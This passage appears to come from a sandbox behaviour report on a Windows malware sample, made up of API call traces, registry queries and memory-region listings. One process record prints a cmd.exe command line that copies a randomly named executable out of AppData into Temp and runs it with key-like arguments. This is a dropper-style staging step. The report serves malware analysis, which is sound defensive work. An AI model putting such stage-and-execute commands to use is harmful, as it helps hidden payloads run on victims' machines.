dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, 
lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.797] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.797] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.797] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 
[0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.798] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.798] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.798] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, 
lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.799] _get_osfhandle (_FileHandle=4) returned 0x54 [0092.799] ReadFile (in: hFile=0x54, lpBuffer=0x14f338, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e528, lpOverlapped=0x0 | out: lpBuffer=0x14f338*, lpNumberOfBytesRead=0x14e528*=0x200, lpOverlapped=0x0) returned 1 [0092.799] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e508 | out: lpNewFilePointer=0x0) returned 1 [0092.819] _close (_FileHandle=4) returned 0 [0092.820] FindNextFileW (in: hFindFile=0x2a0e20, lpFindFileData=0x14f59c | out: lpFindFileData=0x14f59c) returned 0 [0092.820] GetLastError () returned 0x12 [0092.820] FindClose (in: hFindFile=0x2a0e20 | out: hFindFile=0x2a0e20) returned 1 [0092.820] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0092.823] _close (_FileHandle=3) returned 0 [0092.823] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.823] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.824] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.824] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a7d41ac | out: lpMode=0x4a7d41ac) returned 1 [0092.824] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.824] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a7d41b0 | out: lpMode=0x4a7d41b0) returned 1 [0092.824] SetConsoleInputExeNameW () returned 0x1 [0092.824] GetConsoleOutputCP () returned 0x1b5 [0092.824] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a7d4260 | out: lpCPInfo=0x4a7d4260) returned 1 [0092.824] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.824] exit (_Code=0) Process: id = "4" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16180" os_pid = "0xaac" os_integrity_level = "0x3000" os_privileges = 
"0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xa88" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 249 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 250 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 251 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 252 start_va = 0x70000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 253 start_va = 0x4a0f0000 end_va = 0x4a13bfff entry_point = 0x4a0f0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 254 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 255 start_va = 0x77470000 end_va = 0x77470fff entry_point = 
0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 256 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 257 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 258 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 259 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 260 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 261 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 262 start_va = 0x170000 end_va = 0x1d6fff entry_point = 0x170000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 263 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 264 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 265 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 266 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 
region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 267 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 268 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 269 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 270 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 271 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 272 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 273 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 274 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 275 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: 
"c:\\windows\\system32\\msctf.dll") Region: id = 276 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 277 start_va = 0x1e0000 end_va = 0x1e1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 278 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 279 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 280 start_va = 0x420000 end_va = 0x520fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 281 start_va = 0x530000 end_va = 0x112ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 282 start_va = 0x1130000 end_va = 0x1292fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001130000" filename = "" Region: id = 283 start_va = 0x12a0000 end_va = 0x156efff entry_point = 0x12a0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 4 os_tid = 0xab0 [0092.880] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x16ff4c | out: lpSystemTimeAsFileTime=0x16ff4c*(dwLowDateTime=0x764570a0, dwHighDateTime=0x1d440a9)) [0092.880] GetCurrentProcessId () returned 0xaac [0092.880] GetCurrentThreadId () returned 0xab0 [0092.880] GetTickCount () returned 0x22857 [0092.880] QueryPerformanceCounter (in: lpPerformanceCount=0x16ff44 | out: lpPerformanceCount=0x16ff44*=14966891127) returned 1 [0092.880] GetModuleHandleA (lpModuleName=0x0) returned 0x4a0f0000 [0092.880] __set_app_type (_Type=0x1) [0092.880] __p__fmode () returned 0x76b331f4 [0092.880] __p__commode 
() returned 0x76b331fc [0092.880] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a1121a6) returned 0x0 [0092.881] __getmainargs (in: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c, _DoWildCard=0, _StartInfo=0x4a114140 | out: _Argc=0x4a114238, _Argv=0x4a114240, _Env=0x4a11423c) returned 0 [0092.881] GetCurrentThreadId () returned 0xab0 [0092.881] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xab0) returned 0x38 [0092.881] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0092.881] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0092.881] SetThreadUILanguage (LangId=0x0) returned 0x409 [0092.881] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0092.881] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x16fedc | out: phkResult=0x16fedc*=0x0) returned 0x2 [0092.881] VirtualQuery (in: lpAddress=0x16ff13, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x16f000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x70000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x70000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x71000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x71000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x73000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x73000, AllocationBase=0x70000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, 
Protect=0x4, Type=0x20000)) returned 0x1c [0092.881] VirtualQuery (in: lpAddress=0x170000, lpBuffer=0x16feac, dwLength=0x1c | out: lpBuffer=0x16feac*(BaseAddress=0x170000, AllocationBase=0x170000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0092.881] GetConsoleOutputCP () returned 0x1b5 [0092.881] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a114260 | out: lpCPInfo=0x4a114260) returned 1 [0092.881] SetConsoleCtrlHandler (HandlerRoutine=0x4a10e72a, Add=1) returned 1 [0092.881] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.881] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0092.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.882] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a1141ac | out: lpMode=0x4a1141ac) returned 1 [0092.882] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.882] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.882] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.882] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a1141b0 | out: lpMode=0x4a1141b0) returned 1 [0092.882] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.882] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0092.882] GetEnvironmentStringsW () returned 0x260380* [0092.882] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.883] GetEnvironmentStringsW () returned 0x260380* [0092.883] FreeEnvironmentStringsW (penv=0x260380) returned 1 [0092.883] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ee4c | out: phkResult=0x16ee4c*=0x40) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x30, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, 
lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x0, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegCloseKey (hKey=0x40) returned 0x0 [0092.883] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x16ee4c | out: phkResult=0x16ee4c*=0x40) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x40, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: 
lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x1, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x0, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x4, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x4) returned 0x0 [0092.883] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x16ee54, lpData=0x16ee58, lpcbData=0x16ee50*=0x1000 | out: lpType=0x16ee54*=0x0, lpData=0x16ee58*=0x9, lpcbData=0x16ee50*=0x1000) returned 0x2 [0092.883] RegCloseKey (hKey=0x40) returned 0x0 [0092.883] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886347 [0092.883] srand (_Seed=0x5b886347) [0092.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" && \"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\CNuu8Vyt.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"PREPARING\" \"60000\"" [0092.883] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > 
